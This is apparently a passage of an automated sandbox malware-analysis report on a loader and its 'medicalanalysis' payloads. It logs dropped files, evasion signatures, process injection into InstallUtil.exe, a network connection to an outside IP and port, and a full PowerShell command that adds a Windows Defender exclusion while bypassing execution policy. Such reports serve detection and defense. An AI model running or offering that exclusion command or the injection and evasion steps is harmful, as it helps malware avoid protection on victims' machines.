                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED044
                    Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED044
                    Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 506B83A
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory allocated: A70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory allocated: 26A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory allocated: 2410000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeMemory allocated: 16E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeMemory allocated: 3240000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeMemory allocated: 5240000 memory reserve | memory write watch
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6622Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2721Jump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pcsc.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\w2k_lsa_auth.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\mlib_image.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge-32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\rmiregistry.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\instrument.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\deploy.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\CampaignHardwareLauncher\uninst.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr100.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\plugin2\npjp2.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\servertool.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\deployJava1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_sw.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kcms.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\resource.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\policytool.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxmedia.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\pack200.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ssvagent.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jabswitch.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\klist.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jli.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaws.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\eula.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\unpack.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\npt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\sunec.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jpeg.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\lcms.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jawt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2ssv.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java_crw_demo.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsoundds.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcp120.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxwebkit.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfr.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_shmem.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ktab.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jaas_nt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jjs.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fontmanager.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glass.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\keytool.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsdt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pkcs11.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2launcher.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\nio.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fxplugins.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr120.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\wsdetect.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\client\jvm.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\t2k.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_socket.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\rmid.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\unpack200.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.cplJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\decora_sse.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\gstreamer-lite.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\verify.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ssv.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dcpr.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\tnameserv.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\plugin2\msvcr100.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java-rmi.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\net.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscB629.tmp\UAC.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge-32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_d3d.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsound.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glib-lite.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge-32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\npdeployJava1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jdwp.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\orbd.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\bci.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\zip.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2iexp.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font_t2k.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_iio.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2native.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\hprof.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\awt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\sunmscapi.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kinit.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_common.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\splashscreen.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\management.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-2442
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6200Thread sleep count: 6622 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6200Thread sleep count: 2721 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2284Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe TID: 6716Thread sleep count: 44 > 30
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe TID: 6716Thread sleep time: -43956s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe TID: 6308Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,12_2_00007FF7600A204C
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A64E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,12_2_00007FF7600A64E4
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\Jump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\Jump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\clientJump to behavior
                    Source: javaw.exe, 00000003.00000003.2175448821.0000000015266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
                    Source: javaw.exe, 00000003.00000003.2175448821.0000000015266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: org/omg/CORBA/OMGVMCID.classPK
                    Source: javaw.exe, 00000003.00000002.4535680788.0000000002AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cjava/lang/VirtualMachineError
                    Source: javaw.exe, 00000003.00000002.4535680788.0000000002AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t[Ljava/lang/VirtualMachineError;
                    Source: javaw.exe, 00000003.00000003.2175448821.0000000015266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )Q+com/sun/corba/se/impl/util/SUNVMCID.classPK
                    Source: javaw.exe, 00000003.00000003.2175448821.0000000015266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: java/lang/VirtualMachineError.classPK
                    Source: javaw.exe, 00000003.00000002.4535680788.0000000002AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lVirtualMachineError.java
                    Source: javaw.exe, 00000003.00000002.4532484003.000000000103B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeCode function: 2_2_00401150 SetUnhandledExceptionFilter,__getmainargs,_iob,_iob,_setmode,_iob,_iob,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,2_2_00401150
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A8790 SetUnhandledExceptionFilter,12_2_00007FF7600A8790
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A8494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF7600A8494
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeMemory protected: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.37.175.218 7982
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILEJump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 449000
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 478000
